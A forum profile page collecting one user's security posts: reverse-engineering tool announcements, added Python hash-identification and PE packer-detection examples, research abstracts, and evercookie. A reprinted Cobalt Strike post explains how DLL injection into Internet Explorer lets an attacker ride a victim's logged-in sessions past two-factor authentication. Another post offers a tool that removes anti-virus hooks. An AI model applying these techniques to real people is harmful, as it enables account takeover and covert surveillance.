Nytro

Everything posted by Nytro

  1. SDT Cleaner
     Author: Nahuel C. Riva
     Website: Corelabs site
     Current version: 1.0
     Direct D/L link: Locally archived copy

     SDT Cleaner is a tool that intends to clean the SSDT (System Service Descriptor Table) of hooks.
     * SDT Cleaner lets you remove hooks installed by anti-virus products and firewalls.
     * In this first release, the tool collects information about the running kernel, then switches to kernel mode and, if there are any hooks in the SSDT, replaces them with the original entries.

     Download: http://corelabs.coresecurity.com/index.php?module=Wiki&action=attachment&type=tool&page=SDT_Cleaner&file=SDTCleaner-v1.0.zip
     Source: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  2. Kernel Detective
     Author: GamingMaster - AT4RE
     Website: http://www.at4re.com
     Current version: 1.4.1
     Last updated: December 10, 2010
     Direct D/L link: Locally archived copy

     Kernel Detective is a free tool that helps you detect, analyze, manually modify and fix some Windows NT kernel modifications. Kernel Detective gives you direct access to the kernel, so it is not oriented towards newbies. Changing essential kernel-mode objects without enough knowledge will lead you to only one result ... BSoD!

     Supported NT versions: XP/Vista/Server 2008/Seven

     Kernel Detective gives you the ability to:
     1- Detect hidden processes.
     2- Detect hidden threads.
     3- Detect hidden DLLs.
     4- Detect hidden handles.
     5- Detect hidden drivers.
     6- Detect hooked SSDT.
     7- Detect hooked Shadow SSDT.
     8- Detect hooked IDT.
     9- Detect kernel-mode code modifications and hooks.
     10- Disassemble (read/write) kernel-mode/user-mode memory.
     11- Monitor debug output on your system.

     Processes: enumerate running processes and print important values like Process Id, Parent Process Id, ImageBase, EntryPoint, VirtualSize, PEB block address and EPROCESS block address. Special undocumented detection algorithms were implemented to detect hidden processes.
     Threads: detect hidden and suspicious threads in the system and allow the user to forcibly terminate them.
     DLLs: enumerate a specific running process's dynamic-link libraries and show every DLL's ImageBase, EntryPoint, Size and Path. You can also inject or free a specific module.
     Handles: enumerate a specific running process's open handles, show every handle's object name and address, and close the handle.
     Drivers: enumerate loaded kernel-mode drivers and show every driver's ImageBase, EntryPoint, Size, Name and Path. Undocumented detection algorithms were implemented to detect hidden drivers.
     SSDT: scan the system service table (SSDT) and show every service function address next to the real function address; the detection algorithm was improved to bypass KeServiceDescriptorTable EAT/IAT hooks. You can restore a single service function address or restore the whole table.
     Shadow SSDT: scan the shadow system service table (Shadow SSDT) and show every shadow service function address next to the real function address. You can restore a single shadow service function address or restore the whole table.
     IDT: scan the interrupt descriptor table (IDT) and show every interrupt handler's offset, selector, type, attributes and real handler offset. This is applied to every processor on multi-processor machines.
     Kernel modules: scan the important system kernel modules, detect modifications in their bodies and analyze them. For now it can detect and restore inline code modifications, EAT and IAT hooks. I'm looking into other types of hooks for the next releases of Kernel Detective.
     Disassembler: a nice disassembler relying on OllyDbg's disasm engine (thanks to Oleh Yuschuk for publishing it). With it you can disassemble, assemble and hex-edit the virtual memory of a specific process or even kernel-space memory. Kernel Detective uses its own read/write routines from kernel mode and doesn't rely on any Windows API. That makes Kernel Detective able to read/write a process's VM even if NtReadProcessMemory/NtWriteProcessMemory is hooked, and it also bypasses hooks on other important kernel-mode routines like KeStackAttachProcess and KeAttachProcess.
     DebugView: show the messages sent by drivers to the kernel debugger, just like DbgView by Mark Russinovich. It does this by hooking interrupt 0x2D, which is responsible for outputting debug messages. Hooking interrupts may cause problems on some machines, so DebugView is turned off by default; to turn it on you must run Kernel Detective with the "-debugv" parameter.

     Download: http://www.woodmann.com/collaborative/tools/images/Bin_Kernel_Detective_2010-12-10_17.28_Kernel_Detective_v1.4.1.rar
     Source: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  3. Codetective Analysis Tool
     Author: Francisco Gama Tabanez Ribeiro
     Website: http://www.digitalloft.org
     Current version: 0.7
     Last updated: March 26, 2012
     Direct D/L link: Locally archived copy

     Sometimes we run into hashes and other codes and can't figure out where they came from and how they were built. If you work on pen-testing that might easily happen when you are testing systems from a black-box perspective and you are able to grab a password file with hashed contents, maybe from an exposed backup file or by dumping memory. This may also be useful as part of a fingerprinting process. You can either use the generic version or a plugin for the Volatility framework; the usage is similar.

     Currently supports: shadow and SAM files, phpBB3, Wordpress, Joomla, CRC, LM, NTLM, MD4, MD5, Apr, SHA1, SHA256, base64, MySQL323, MYSQL4+, MSSQL2000, MSSQL2005, DES, RipeMD320, Whirlpool, SHA1, SHA224, SHA256, SHA384, SHA512, Blowfish, UUID

     Download: http://www.woodmann.com/collaborative/tools/images/Bin_Codetective_Analysis_Tool_2012-4-13_15.31_codetective.zip
     Source: Category:Crypto Tools - Collaborative RCE Tool Library
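The kind of format-based identification Codetective performs, as an added Python example (this is not Codetective's code): a token is classified by prefix, alphabet and length, and the hash field is pulled out of /etc/shadow and pwdump-style SAM lines. The sample inputs are constructed inline. Where several algorithms share an output size (MD4/MD5/NTLM/LM at 32 hex digits, SHA-1/RIPEMD-160 at 40, SHA-512/Whirlpool at 128) the label names all of them, because length alone cannot tell them apart; a bare hex digest is therefore always a candidate list, never a certainty.

```python
import hashlib
import re

HEX = "[0-9A-Fa-f]"
B64 = "[./0-9A-Za-z]"          # crypt(3) / phpass alphabet

# (label, regex) rules, most specific first. A bare hex digest is identified by
# length only, so every algorithm with that output size is named in the label.
RULES = [
    ("Unix crypt MD5 ($1$)",             rf"\$1\${B64}{{1,8}}\${B64}{{22}}"),
    ("Apache apr1",                      rf"\$apr1\${B64}{{1,8}}\${B64}{{22}}"),
    ("Unix crypt SHA-256 ($5$)",         rf"\$5\$(rounds=\d+\$)?{B64}{{1,16}}\${B64}{{43}}"),
    ("Unix crypt SHA-512 ($6$)",         rf"\$6\$(rounds=\d+\$)?{B64}{{1,16}}\${B64}{{86}}"),
    ("bcrypt / Blowfish crypt",          rf"\$2[aby]?\$\d\d\${B64}{{53}}"),
    ("phpass (phpBB3 $H$, WordPress $P$)", rf"\$[HP]\${B64}{{31}}"),
    ("MySQL 4.1+ (PASSWORD())",          rf"\*{HEX}{{40}}"),
    ("MSSQL 2000",                       rf"0x0100{HEX}{{88}}"),
    ("MSSQL 2005",                       rf"0x0100{HEX}{{48}}"),
    ("UUID",                             rf"{HEX}{{8}}-{HEX}{{4}}-{HEX}{{4}}-{HEX}{{4}}-{HEX}{{12}}"),
    ("CRC32 (8 hex)",                    rf"{HEX}{{8}}"),
    ("MySQL323 (16 hex)",                rf"{HEX}{{16}}"),
    ("MD4 / MD5 / NTLM / LM (32 hex)",   rf"{HEX}{{32}}"),
    ("SHA-1 / RIPEMD-160 (40 hex)",      rf"{HEX}{{40}}"),
    ("SHA-224 (56 hex)",                 rf"{HEX}{{56}}"),
    ("SHA-256 (64 hex)",                 rf"{HEX}{{64}}"),
    ("RIPEMD-320 (80 hex)",              rf"{HEX}{{80}}"),
    ("SHA-384 (96 hex)",                 rf"{HEX}{{96}}"),
    ("SHA-512 / Whirlpool (128 hex)",    rf"{HEX}{{128}}"),
]
COMPILED = [(label, re.compile(pat)) for label, pat in RULES]


def identify(token):
    """Return every rule label the token matches (empty list if none)."""
    token = token.strip()
    labels = [label for label, rx in COMPILED if rx.fullmatch(token)]
    # base64 is only worth reporting when the token cannot be read as plain hex,
    # otherwise every 32/64-digit digest would also be flagged as base64.
    if (len(token) % 4 == 0 and len(token) >= 8
            and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token)
            and not re.fullmatch(rf"{HEX}+", token)):
        labels.append("base64")
    return labels


def classify(line):
    """Classify a bare token, an /etc/shadow entry or a pwdump-style SAM line.
    Returns a list of (field, labels) pairs, one per hash field found."""
    parts = line.strip().split(":")
    # /etc/shadow: user:$id$salt$hash:lastchg:min:max:warn:inactive:expire:
    if len(parts) >= 8 and parts[1].startswith("$"):
        return [(parts[1], identify(parts[1]))]
    # pwdump / SAM dump: user:RID:LMhash:NThash:::
    if (len(parts) >= 4 and parts[1].isdigit()
            and all(re.fullmatch(rf"{HEX}{{32}}", p) for p in parts[2:4])):
        return [(parts[2], ["LM (pwdump SAM field)"]),
                (parts[3], ["NTLM (pwdump SAM field)"])]
    return [(line.strip(), identify(line.strip()))]


# Constructed sample inputs: digests of the word "password" computed here, plus
# hand-built shadow/pwdump lines whose hash fields are placeholders, not real hashes.
SAMPLES = [
    hashlib.md5(b"password").hexdigest(),
    hashlib.sha1(b"password").hexdigest(),
    hashlib.sha256(b"password").hexdigest(),
    "*" + hashlib.sha1(hashlib.sha1(b"password").digest()).hexdigest().upper(),  # MySQL PASSWORD()
    "cGFzc3dvcmQ=",
    "root:$6$rounds=5000$saltsalt$" + "x" * 86 + ":18000:0:99999:7:::",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:" + "0" * 32 + ":::",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        for field, labels in classify(sample):
            print(f"{field[:40]:<42} {', '.join(labels) or 'unknown'}")
```

The rules are checked in order but all matches are kept, so the caller sees the full candidate set and can narrow it with context (a 32-hex value next to a RID is NTLM, the same value in a web application's users table is more likely MD5).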
  4. Visual DuxDebugger

     Visual DuxDebugger is a 64-bit debugger and disassembler for Windows, especially useful when source code is unavailable. The user interface is very intuitive, so it makes any reverse engineering task very simple: you can edit code, registers, and memory. Visual DuxDebugger provides extensive information about the process being debugged, showing all loaded modules with all exported functions, the call stack, threads and much more. The main difference from other debuggers is that Visual DuxDebugger can debug child processes and multiple processes.

     Software reverse engineering is commonly used:
     · As a learning tool to understand undocumented APIs.
     · As a way to make new compatible products.
     · For making software interoperate more effectively.
     · To bridge different operating systems or databases.
     · To analyze possible spyware / malware.
     · To uncover and exploit vulnerabilities.
     · To audit software.
     · To fix complex bugs.
     · For litigation support.

     Download: http://www.duxcore.com/index.php/prod/visual-duxdebugger/overview
  5. EDB Linux Debugger
     Author: Evan Teran
     Website: CodeF00 [ Projects ]
     Current version: 0.9.17
     Last updated: April 14, 2011
     Direct D/L link: http://codef00.com/projects/debugger-0.9.17.tgz

     Features
     * Intuitive GUI interface
     * The usual debugging operations (step-into/step-over/run/break)
     * Conditional breakpoints
     * The debugging core is implemented as a plugin so people can have drop-in replacements. Of course, if a given platform has several debugging APIs available, then you may have a plugin that implements any of them.
     * Basic instruction analysis
     * View/dump memory regions
     * Effective address inspection
     * The data dump view is tabbed, allowing you to have several views of memory open at the same time and quickly switch between them.
     * Importing of symbol maps
     * Plugins
       o Search for binary strings
       o Code bookmarks
       o Breakpoint management
       o Check for updates
       o Environment variable viewer
       o Heap block enumeration
       o Opcode search engine plugin with basic functionality (similar to msfelfscan/msfpescan)
       o Open file enumeration
       o Reference finder
       o String searching (like the strings command on *nix)

     One of the main goals of this debugger is isolation of the debugger core from the display you see. The interface is written in Qt 4 and is thus source-portable to many platforms. The debugger core is actually a plugin and the platform-specific code is isolated to just a few files; porting to a new OS would require porting these few files and implementing a plugin which implements the "DebuggerCoreInterface" interface. Also, because the plugins are based on the QPlugin API and do their work through the DebuggerCoreInterface object, they are almost always portable with just a simple recompile. So far, the only plugin I have written which would not port with just a recompile is the heap analysis plugin, due to its highly system-specific nature.

     Download: http://codef00.com/projects/debugger-0.9.17.tgz
     Source: Category:Ring 3 Debuggers - Collaborative RCE Tool Library
  6. PEiD
     Author: BoB
     Website: BobSoft - [Main Page]
     Current version: 0.95
     Last updated: March 31, 2008
     Direct D/L link: http://www.woodmann.com/BobSoft/Files/Other/PEiD-0.95-20081103.zip

     PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects when compared to the other identifiers already out there:
     1. It has a superb GUI and the interface is really intuitive and simple.
     2. Detection rates are amongst the best given by any other identifier.
     3. Special scanning modes for *advanced* detection of modified and unknown files.
     4. Shell integration, command line support, always-on-top and drag'n'drop capabilities.
     5. Multiple file and directory scanning with recursion.
     6. Task viewer and controller.
     7. Plugin interface with plugins like Generic OEP Finder and Krypto ANALyzer.
     8. Extra scanning techniques used for even better detection.
     9. Heuristic scanning options.
     10. New PE details, imports, exports and TLS viewers.
     11. New built-in quick disassembler.
     12. New built-in hex viewer.
     13. External signature interface which can be updated by the user.

     Download: http://www.woodmann.com/BobSoft/Files/Other/PEiD-0.95-20081103.zip
     Source: Category:Packer Identifiers - Collaborative RCE Tool Library
  7. RDG Packer Detector
     Author: RDGMax
     Website: RDGMax - RDGSoFT
     Current version: 0.6.7
     Last updated: June 26, 2011
     Direct D/L link: http://rdgsoft.8k.com/images/v0.6.7%20Vx%20Edition/RDG%20Packer%20Detector%20v0.6.7%202011%20Vx-Edition.rar

     RDG Packer Detector is a detector of packers, cryptors, compilers, scramblers, joiners and installers.
     - Has a fast detection mode.
     - Has a powerful detection mode that analyzes the complete file, allowing the detection of multi-packers in several cases.
     - You can create your own detection signatures.
     - Includes a cryptographic analyzer.
     - Allows you to calculate the checksum of a file.
     - Allows you to calculate the entropy, reporting whether the program looks compressed or encrypted.
     - OEP (Original Entry Point) detector.
     - You can check for and download updated signatures; RDG Packer Detector will keep being updated.
     - Plug-in loader.
     - Signature converter.
     - Detector of distorted entry points.
     - De-binder, an extractor of attachments.
     - Improved heuristic system.

     What's new in v0.6.6:
     - New interface!
     - Fast mode and powerful mode detection improved!
     - Signature base updated!
     - Heuristic detection of binders
     - Detection and extraction of overlays!
     - Check and auto-update of signatures!
     - Super fast detection of MD5 hash!
     - Support for multiple plug-ins, for both RDG Packer Detector and other detectors!
     - Detection of multiple formats: MPG, GIF, RAR, ZIP, MP3 etc.
     - Detection and removal of attachments!

     Download: http://rdgsoft.8k.com/images/v0.6.7%20Vx%20Edition/RDG%20Packer%20Detector%20v0.6.7%202011%20Vx-Edition.rar
     Source: Category:PE EXE Signature Tools - Collaborative RCE Tool Library
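PEiD (post 6) and RDG Packer Detector (post 7) both rest on the same two primitives: matching a byte signature at the program's entry point and measuring the entropy of the code that sits there. The following is an added Python example and not code from either tool. It maps AddressOfEntryPoint (an RVA) to a file offset through the section table, matches signatures written in PEiD's userdb.txt syntax (`??` is a wildcard byte), and flags an entry-point section with entropy near 8 bits/byte as probably packed or encrypted. The two signatures and the minimal PE produced by build_test_pe are constructed stand-ins for this example; they are not PEiD's database entries or a real binary.

```python
import math
import struct

# PEiD-syntax entry-point signatures. CONSTRUCTED for this example; the real
# PEiD database entries for UPX and MSVC are longer than these stubs.
SIGNATURES = {
    "UPX-like stub (constructed)":      "60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF",
    "MSVC-like prologue (constructed)": "55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1",
}


def parse_signature(sig):
    """'60 BE ?? FF' -> [0x60, 0xBE, None, 0xFF]; None matches any byte."""
    return [None if tok == "??" else int(tok, 16) for tok in sig.split()]


def matches_at(data, offset, pattern):
    """True if pattern matches data at exactly this offset (ep_only semantics)."""
    if offset < 0 or offset + len(pattern) > len(data):
        return False
    return all(p is None or data[offset + i] == p for i, p in enumerate(pattern))


def locate_entry_point(pe):
    """Return (file offset of the entry point, section name, section raw bytes).
    Walks IMAGE_DOS_HEADER -> IMAGE_NT_HEADERS -> section table by hand."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    ep_rva = struct.unpack_from("<I", pe, opt + 16)[0]    # AddressOfEntryPoint
    sect = opt + opt_size                                 # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        hdr = sect + i * 40
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if va <= ep_rva < va + max(vsize, raw_size):
            return raw_ptr + (ep_rva - va), name, pe[raw_ptr:raw_ptr + raw_size]
    raise ValueError("entry point RVA is outside every section")


def shannon_entropy(data):
    """Bits per byte in 0.0..8.0. Compressed or encrypted code sits close to 8."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def scan(pe, packed_threshold=7.0):
    """Signature hits at the entry point plus an entropy verdict on its section."""
    ep, section, section_data = locate_entry_point(pe)
    hits = [name for name, sig in SIGNATURES.items()
            if matches_at(pe, ep, parse_signature(sig))]
    entropy = shannon_entropy(section_data)
    return {"ep_offset": ep, "ep_section": section, "matches": hits,
            "entropy": round(entropy, 2), "likely_packed": entropy >= packed_threshold}


def build_test_pe(ep_code, section_body):
    """CONSTRUCTED minimal PE32 with one section and no imports. It is not
    loadable by Windows; it exists only to exercise the header parsing above."""
    pe_off, opt_size, raw_ptr, va = 0x80, 224, 0x200, 0x1000
    body = ep_code + section_body
    dos = bytearray(pe_off)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_off)                     # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, va)                            # AddressOfEntryPoint
    sect = b".text\0\0\0" + struct.pack("<IIII", len(body), va, len(body), raw_ptr) + b"\0" * 16
    return (bytes(dos) + coff + bytes(opt) + sect).ljust(raw_ptr, b"\0") + body


if __name__ == "__main__":
    packed = build_test_pe(bytes.fromhex("60BE001040008DBE00F0FFFF5783CDFF"), bytes(range(256)) * 16)
    plain = build_test_pe(bytes.fromhex("558BEC6AFF6800204000681030400064A1"),
                          (b"\x90" * 32 + b"\x00" * 32) * 32)
    for label, sample in (("packed", packed), ("plain", plain)):
        print(label, scan(sample))
```

Two caveats a practitioner would want: a signature hit only says the entry-point bytes look like a known stub (a packer can be given a custom stub, and a "modified" file is exactly what PEiD's heuristic modes try to catch), and the entropy verdict is a statistical guess that also fires on large embedded resources or certificate blobs, so treat the two signals together rather than either alone.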
  8. Java Decompiler
     Author: Java Decompiler project
     Website: http://java.decompiler.free.fr
     Current version: 0.3.2
     Last updated: March 20, 2010

     The "Java Decompiler project" aims to develop tools in order to decompile and analyze Java 5 "byte code" and later versions. JD-Core is a freeware library that reconstructs Java source code from one or more ".class" files. JD-Core may be used to recover lost source code and explore the source of Java runtime libraries. New features of Java 5, such as annotations, generics or the "enum" type, are supported. JD-GUI and JD-Eclipse include the JD-Core library. JD-GUI is a standalone graphical utility that displays the Java source code of ".class" files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields. JD-Eclipse is a plug-in for the Eclipse platform. It allows you to display all the Java sources during your debugging process, even if you do not have them all. JD-Core, JD-GUI and JD-Eclipse are free for non-commercial use. This means that JD-Core, JD-GUI and JD-Eclipse shall not be included or embedded in commercial software products. Nevertheless, these projects may be freely used for personal needs in a commercial or non-commercial environment.

     Download: http://java.decompiler.free.fr/
     Source: Category:Java Decompilers - Collaborative RCE Tool Library
  9. Javassist
     Author: Shigeru Chiba
     Website: http://www.csg.is.titech.ac.jp/~chiba/javassist/
     Current version: 3.12.0.GA
     Last updated: April 16, 2010

     Javassist (Java Programming Assistant) makes Java bytecode manipulation simple. It is a class library for editing bytecode in Java; it enables Java programs to define a new class at runtime and to modify a class file when the JVM loads it. Unlike other similar bytecode editors, Javassist provides two levels of API: source level and bytecode level. If users use the source-level API, they can edit a class file without knowledge of the Java bytecode specification. The whole API is designed with only the vocabulary of the Java language. You can even specify inserted bytecode in the form of source text; Javassist compiles it on the fly. On the other hand, the bytecode-level API allows users to directly edit a class file like other editors.

     Aspect Oriented Programming: Javassist can be a good tool for adding new methods to a class and for inserting before/after/around advice on both the caller and callee sides.
     Reflection: one application of Javassist is runtime reflection; Javassist enables Java programs to use a metaobject that controls method calls on base-level objects. No specialized compiler or virtual machine is needed.

     Download: www.csg.is.titech.ac.jp/~chiba/javassist/
     Source: Category:Java Executable Editors & Patchers - Collaborative RCE Tool Library
  10. Malzilla
     Author: Boban "bobby" Spasic
     Website: Malzilla - malware hunting tool
     Current version: 1.2.0
     Last updated: November 2, 2008
     Direct D/L link: Malzilla - Malware hunting tool

     Malware hunting tool. Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. MalZilla is a useful program for exploring malicious pages. It allows you to choose your own user agent and referrer, and has the ability to use proxies. It shows you the full source of web pages and all the HTTP headers. It also gives you various decoders to try to deobfuscate JavaScript.

     Download: http://malzilla.sourceforge.net/downloads.html
     Source: Category:Javascript Deobfuscators - Collaborative RCE Tool Library
  11. PE-bear – version 0.2.5 available!

     Hi! Finally, I found some time for PE-bear… Thank you for all your comments and feature requests. I did not manage to implement them all for this release, but I noted them all, and I promise, none will be neglected. You can expect a new bundle of features on 7th October 2013. But first, take a look at what comes this time… Links to download are (as usual) here: PE-bear | hasherezade's 1001 nights

     Changelog
     Special thanks to Ange Albertini for testing and consultation!
     Major features:
     [feat#1] Permanently visible Hex/Text view
     [feat#2] Highlighting Hex/Text representation of any selected element
     [feat#3] Update notification
     [feat#4] Showing position of Entry Point on left PE structure tree
     [feat#5] In Disasm – resolving strings pushed on the stack
     [feat#6] Configurable disassembly bit mode
     …and others

     Screenshots (captions only): [feat#1] Permanently visible Hex/Text view; [feat#2] Highlighting Hex/Text representation of any selected element; [feat#6] Configurable disassembly bit mode; Navigation changes

     Download: http://hshrzd.wordpress.com/pe-bear/
     Source: https://hshrzd.wordpress.com/2013/09/26/pe-bear-version-0-2-5-avaliable/
  12. Browser Pivoting (Get past two-factor auth)
     September 26, 2013

     Several months ago, I was asked if I had a way to get past two-factor authentication on web applications. Criminals do it, but penetration testers don't. To solve this problem, I built a man-in-the-browser capability for penetration testers and red teams. I call it browser pivoting.

     A browser pivot is an HTTP proxy server that injects into a 32-bit Internet Explorer process. By browsing through this proxy server, I can reach any website my target logged into, as them. If the target logs into their web mail, I'm logged into their web mail. If they send sob stories to their ex-girlfriend on Facebook, I read them. If they use DropBox's website to store and manage files, I'll download the best ones. If they're connected to an intranet portal site, I'm there too.

     How it Works

     Internet Explorer's architecture makes browser pivoting possible. Internet Explorer is an application that consumes several libraries. WinINet is the library Internet Explorer uses to communicate. The WinINet API is popular with malware developers because it allows them to request content from a URL with very little code. WinINet is more than a high-level HTTP library built on top of Windows sockets. WinINet manages a lot of state for the applications that use it.

     I became familiar with WinINet during Beacon's development. I tried to use the Cookie header to send information. I was baffled when this cookie kept coming back blank. I didn't know this at the time, but WinINet removed my cookie to insert the cookie from its store into my request. I had to set the INTERNET_FLAG_NO_COOKIES flag before I could programmatically send my cookie.

     Cookies aren't the only thing WinINet forces into a request. WinINet will also retransmit "credential material", which includes a previously provided username/password or client SSL certificate. If WinINet is communicating with a site in the Intranet Zone (and the user's settings permit it), WinINet will automatically try to log on with the user's default credentials. The WinINet consumer must set the INTERNET_OPTION_SUPPRESS_SERVER_AUTH flag to disable this behavior. WinINet is the layer that manages Internet Explorer's cache, history, cookies, HTTP authentication, and SSL session state. Inheriting this managed state isn't a bug; it's a feature.

     A browser pivot is an HTTP proxy server that fulfills requests with WinINet. The process this proxy server lives in is important. If I inject this proxy server into notepad.exe, I don't get anything interesting. Magic happens when I inject [0] this proxy server into the Internet Explorer process [1]. I inherit Internet Explorer's WinINet state with each request. If a user's web session is secured with a stored cookie, session cookie, HTTP authentication, or client SSL certificate, I can use that session with a browser pivot [2]. Two-factor authentication is a non-issue at this point too. WinINet doesn't care about how this session state was obtained. It just uses it.

     Notes

     [0] Several people have asked about this mysterious process injection thing I refer to. The Browser Pivot proxy server is compiled as a Reflective DLL. I use the Metasploit Framework's post/windows/manage/reflective_dll_inject module to inject this DLL into a process I choose.
     [1] There's one nuance to this: modern versions of Internet Explorer isolate each tab in a separate process. In this case, the parent Internet Explorer process does not have access to WinINet state. The processes associated with a tab share WinINet state with the other tab processes. If you inject into Internet Explorer 10, make sure you inject into a child tab's process.
     [2] WinINet session state is good until the user closes the browser. If the user closes their browser, the proxy server goes away and the attacker must inject into another process. How to keep session state even after the browser closes is not part of this work.

     How to Use It

     Browser Pivoting is available in today's Cobalt Strike update. Go to [host] -> Meterpreter -> Explore -> Browser Pivot. Choose the process to inject into. Press Launch. Cobalt Strike will set up the browser pivot and start a port forward through Meterpreter for you. Set up your browser to go through the browser pivot and have at it.

     Here's a demo of Browser Pivoting in action: (video)

     To keep this blog post sane, I had to skip a lot of details. If you find Browser Pivoting interesting, you can learn more about it at DerbyCon. I'm speaking on the technology at 2pm on Saturday. If you'd like to try Browser Pivoting today, grab a 21-day trial of Cobalt Strike. Licensed users may get the latest with the built-in update program.

     Source: Browser Pivoting (Get past two-factor auth) | Strategic Cyber LLC
  13. 25 Million Flows Later - Large-scale Detection of DOM-based XSS
     Sebastian Lekies, SAP AG, sebastian.lekies@sap.com
     Ben Stock, FAU Erlangen-Nuremberg, ben.stock@cs.fau.de
     Martin Johns, SAP AG, martin.johns@sap.com

     Abstract
     In recent years, the Web witnessed a move towards sophisticated client-side functionality. This shift caused a significant increase in the complexity of deployed JavaScript code and thus a proportional growth in potential client-side vulnerabilities, with DOM-based Cross-site Scripting being a high-impact representative of such security issues. In this paper, we present a fully automated system to detect and validate DOM-based XSS vulnerabilities, consisting of a taint-aware JavaScript engine and corresponding DOM implementation as well as a context-sensitive exploit generation approach. Using these components, we conducted a large-scale analysis of the Alexa top 5000. In this study, we identified 6167 unique vulnerabilities distributed over 480 domains, showing that 9.6% of the examined sites carry at least one DOM-based XSS problem.

     Download: http://ben-stock.de/wp-content/uploads/domxss.pdf
  14. Research detects dangerous malware hiding in peripherals
     By Darren Pauli on Sep 26, 2013 6:30 AM

     A Berlin researcher has demonstrated the capability to detect previously undetectable stealthy malware that resides in graphics and network cards. Patrick Stewin's proof of concept demonstrated that a detector could be built to find the sophisticated malware that ran on dedicated devices and attacked via direct memory access (DMA). The attacks launched by the malware, dubbed DAGGER, targeted host runtime memory using the DMA provided to hardware devices. These attacks were not within the scope of anti-malware systems and therefore not detected.

     DAGGER, also developed by Stewin and Iurii Bystrov of the FGSect Technical University of Berlin research group, attacked 32-bit and 64-bit Windows and Linux systems and could bypass memory address randomisation. After beginning life last year as a keylogger, DAGGER has recently been upgraded with new functionality and now includes the ability to update its attack behaviour at runtime via an out-of-band channel.

     "DMA malware is stealthy to a point where the host cannot detect its presence," Stewin said. In a paper Stewin will present next month, he said the DMA attacks were both dangerous and undetectable. "DMA-based attacks launched from peripherals are capable of compromising the host without exploiting vulnerabilities present in the operating system running on the host. Therefore they present a highly critical threat to system security and integrity. Unfortunately, to date no OS (operating system) implements security mechanisms that can detect DMA-based attacks. Furthermore, attacks against memory management units have been demonstrated in the past and therefore cannot be considered trustworthy."

     The German government-funded research was closing in on its aim of developing a reliable detector for DMA malware. "At the moment we have a proof-of-concept that proves that a detector is possible," Stewin said in an email to SC. "It can find DAGGER."

     The proof of concept was based on a runtime monitor dubbed BARM which modelled expected memory bus activity and compared it to the observed activity, meaning malware residing on peripherals would be detected. Stewin said the detector would not significantly drain compute resources. Some detectors had been developed previously, but they required that peripherals be modified or that a special debug feature exist. The researchers aimed to develop the proof of concept into a detector that did not require modification.

     The pair will present the research paper "A Primitive for Revealing Stealthy Peripheral-based Attacks on the Computing Platform's Main Memory" at the 16th International Symposium on Research in Attacks, Intrusions and Defenses in October in Saint Lucia.

     Source: http://www.scmagazine.com.au/News/358265,research-detects-dangerous-malware-hiding-in-peripherals.aspx
  15. Another one who believed the crap that you can tap phones with it? Does it have a flashlight? I'll give you 30 RON for it if it has a flashlight.
  16. Only on an iPhone do you get the feature that lets the government block the camera if you are in certain conflict zones. Only on an iPhone do you get a fingerprint feature that uploads your fingerprint to Apple's servers only during backup. Only on an iPhone is the production cost 20%-30% and you pay the other 70%-80% for the love of the Apple brand. Only on an iPhone do you get a Justin Bieber design that shatters into 200 pieces if you touch it a bit too hard. Only on an iPhone do you get worse specs than the S4: lower resolution, 2 cores instead of 4, 8 MP instead of 13 MP. I recommend the iPhone. </irony>
  17. Understanding C Integer Boundaries
     Authored by Saif El-Sherei
     This is a brief whitepaper tutorial to help facilitate the understanding of C integer boundaries (overflows and underflows).
     Download: http://packetstormsecurity.com/files/download/123371/understanding-c-integer-boundaries.pdf
     Source: Understanding C Integer Boundaries - Packet Storm
  18. Return-to-libc Tutorial
     Authored by Saif El-Sherei
     This is a brief whitepaper tutorial discussing return-to-libc exploitation.
     Download: http://packetstormsecurity.com/files/download/123370/Return-to-libc-tutorial.pdf
     Source: Return-to-libc Tutorial - Packet Storm
  19. evercookie -- never forget.

     DESCRIPTION
     evercookie is a JavaScript API that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available in the local browser. Additionally, if evercookie finds that the user has removed any of the types of cookies in question, it recreates them using each mechanism available.

     Specifically, when creating a new cookie, it uses the following storage mechanisms when available:
     - Standard HTTP cookies
     - Local Shared Objects (Flash cookies)
     - Silverlight Isolated Storage
     - Storing cookies in the RGB values of auto-generated, force-cached PNGs, using the HTML5 Canvas tag to read the pixels (cookies) back out
     - Storing cookies in web history
     - Storing cookies in HTTP ETags
     - Storing cookies in the web cache
     - window.name caching
     - Internet Explorer userData storage
     - HTML5 Session Storage
     - HTML5 Local Storage
     - HTML5 Global Storage
     - HTML5 Database Storage via SQLite

     TODO: adding support for:
     - Caching in HTTP Authentication
     - Using Java to produce a unique key based off of NIC info

     Got a crazy idea to improve this? Email me!

     Download: http://samy.pl/evercookie/evercookie-0.4.tgz
     Source: http://samy.pl/evercookie/
